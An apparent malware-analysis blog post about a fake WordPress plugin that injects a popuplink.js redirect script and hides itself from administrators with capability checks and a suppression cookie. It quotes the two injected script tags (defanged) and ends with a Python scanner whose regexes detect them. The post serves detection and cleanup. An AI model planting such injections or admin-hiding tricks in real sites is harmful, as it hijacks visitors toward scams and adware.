Fake plugins have been used to compromise websites for a long time. This one injects two scripts into the head of every page so that its JavaScript loads directly, and it is responsible for redirecting visitors to scam and ad websites. The redirect goes through a URL-shortener link (tiny[.]cc in the sample below), which forwards to a fake website that can install adware. The fake plugin is called "index" or "wp_update" and contains a malicious popuplink.js file. Infected pages typically have these two scripts in their head section:

1.

<script type="text/javascript"> window.popuplink_cfg_field="wp_cfg_index";window.wp_cfg_index= {"url":"hxxp:\/\/tiny[.]cc\/6zbfvy","switch":false,"cookie":{"name":"index_is_shown","expires":6000}}

</script>

2.

<script type='text/javascript' src='hxxps://<hacked-site>/wp-content/plugins/index/popuplink.js?ver=4.9.7'></script>

The first tag stores the configuration (redirect URL, an on/off switch, and a cookie name and lifetime) in a global variable; the second loads popuplink.js, which reads that configuration and hooks the 'onclick' event of every link on the infected page. As soon as you click a link, you are sent to the shortened URL, where you have to wait about 5 seconds before you can skip the interstitial, and are then redirected to another website. One motive is money: URL shorteners pay for traffic that lands on their interstitial pages. Another is malware distribution, turning the visitor's PC into a bot that is then used in large-scale attacks by a botnet, the so-called bot army. A compromised computer has many uses to an attacker.

The plugin uses a config.php file to store its settings: the redirect URL, timeouts, the settings that govern whether the plugin is visible, and how the malicious script opens URLs.

It is interesting that they use a long list of user capabilities to work out the role of the current user and hide the plugin's presence whenever that user is a site administrator. It is certainly not the most obvious or efficient way to do it; most likely it is done to obscure what the code does. Hiding the plugin from the Plugins screen does not remove it from disk, so the wp-content/plugins/index or wp-content/plugins/wp_update directory is still visible over SFTP or a shell.

They also use cookies to keep the malware hidden from site admins even after the admins log out. This only works until you switch browsers or clear your cookies; an incognito window bypasses it just as well. The cookie is set so that nothing about it looks suspicious to the user, and it prevents repeated injections/redirects for the same visitor for about 100 minutes (the expires value of 6000 in the config above, if read as seconds). That is what stops an admin from seeing the redirect and tracking the malware down.
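As an added example (not part of the original write-up and not the malware's own code), here is a small Python scanner that checks a page's HTML for the two injected tags quoted above, pulls the redirect URL and the cookie settings out of the inline config, and models the visitor-side cookie gate just described. The sample HTML is constructed, the hostname example-victim.test is a placeholder, and the assumption that the script suppresses itself when the cookie is merely present (rather than checking its value) is inferred from the behaviour described above, not verified against popuplink.js.

```python
import json
import re
from dataclasses import dataclass
from http.cookies import SimpleCookie
from typing import Optional

# Constructed sample of an infected <head>, modelled on the two injected tags
# quoted above (defanged hxxp URLs kept, hostname is a placeholder).
INFECTED_HEAD = """<html><head>
<script type="text/javascript"> window.popuplink_cfg_field="wp_cfg_index";window.wp_cfg_index= {"url":"hxxp:\\/\\/tiny[.]cc\\/6zbfvy","switch":false,"cookie":{"name":"index_is_shown","expires":6000}}
</script>
<script type='text/javascript' src='hxxps://example-victim.test/wp-content/plugins/index/popuplink.js?ver=4.9.7'></script>
</head><body><a href="/post/1">read more</a></body></html>"""

CLEAN_HEAD = "<html><head><title>ok</title></head><body></body></html>"

# Loader tag: popuplink.js served from a plugin directory named index or wp_update.
LOADER_RE = re.compile(
    r"""<script[^>]+src=['"]([^'"]*?/wp-content/plugins/(?:index|wp_update)/popuplink\.js[^'"]*)['"]""",
    re.IGNORECASE,
)
# Inline config: window.popuplink_cfg_field="<name>"; window.<name>= {...}
CFG_FIELD_RE = re.compile(r"""window\.popuplink_cfg_field\s*=\s*['"]([A-Za-z0-9_]+)['"]""")


@dataclass
class PopuplinkFinding:
    loader_src: Optional[str] = None
    cfg_field: Optional[str] = None
    redirect_url: Optional[str] = None
    cookie_name: Optional[str] = None
    cookie_expires: Optional[int] = None  # seconds, as written in the config

    @property
    def infected(self) -> bool:
        return self.loader_src is not None or self.cfg_field is not None

    @property
    def cookie_lifetime_minutes(self) -> Optional[float]:
        return None if self.cookie_expires is None else self.cookie_expires / 60


def _extract_object(html: str, field: str) -> Optional[dict]:
    """Return the JSON object assigned to window.<field>, found by brace matching.
    Assumes no unbalanced braces inside string values, which holds for this config."""
    m = re.search(r"window\." + re.escape(field) + r"\s*=\s*\{", html)
    if not m:
        return None
    start = m.end() - 1
    depth = 0
    for i in range(start, len(html)):
        if html[i] == "{":
            depth += 1
        elif html[i] == "}":
            depth -= 1
            if depth == 0:
                try:
                    return json.loads(html[start : i + 1])
                except json.JSONDecodeError:
                    return None
    return None


def scan_head(html: str) -> PopuplinkFinding:
    """Look for the loader tag and the inline config and pull out the settings."""
    finding = PopuplinkFinding()
    loader = LOADER_RE.search(html)
    if loader:
        finding.loader_src = loader.group(1)
    field = CFG_FIELD_RE.search(html)
    if field:
        finding.cfg_field = field.group(1)
        cfg = _extract_object(html, finding.cfg_field) or {}
        finding.redirect_url = cfg.get("url")
        cookie = cfg.get("cookie") or {}
        finding.cookie_name = cookie.get("name")
        expires = cookie.get("expires")
        finding.cookie_expires = int(expires) if isinstance(expires, (int, float)) else None
    return finding


def would_fire(finding: PopuplinkFinding, cookie_header: str) -> bool:
    """Model of the visitor-side gate described above: the redirect is armed only
    while the suppression cookie is absent. Assumption (not verified against the
    script): presence of the cookie is what matters, not its value."""
    if not finding.infected or not finding.cookie_name:
        return False
    jar = SimpleCookie()
    jar.load(cookie_header)
    return finding.cookie_name not in jar


if __name__ == "__main__":
    f = scan_head(INFECTED_HEAD)
    print("infected:", f.infected)
    print("loader:", f.loader_src)
    print("redirect:", f.redirect_url)
    print("cookie:", f.cookie_name, "suppresses for", f.cookie_lifetime_minutes, "min")
    print("fires for fresh visitor:", would_fire(f, ""))
    print("fires for visitor who saw it:", would_fire(f, f"{f.cookie_name}=1; wp-settings-1=x"))
```

Run it against a page fetched with a fresh session (no cookies, or a private window) and again with the suppression cookie set: the first run reports the redirect as armed, the second as suppressed, which is exactly why an admin who already triggered it once sees nothing for the next 100 minutes. The same two regexes can be run over theme and plugin files under the document root to find where the tags are being injected from.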

Torrent and download websites are the ones infected most often. Visitors click around such sites many times a day, which serves both goals at once: exploiting the visitor's computer and redirecting them to adware.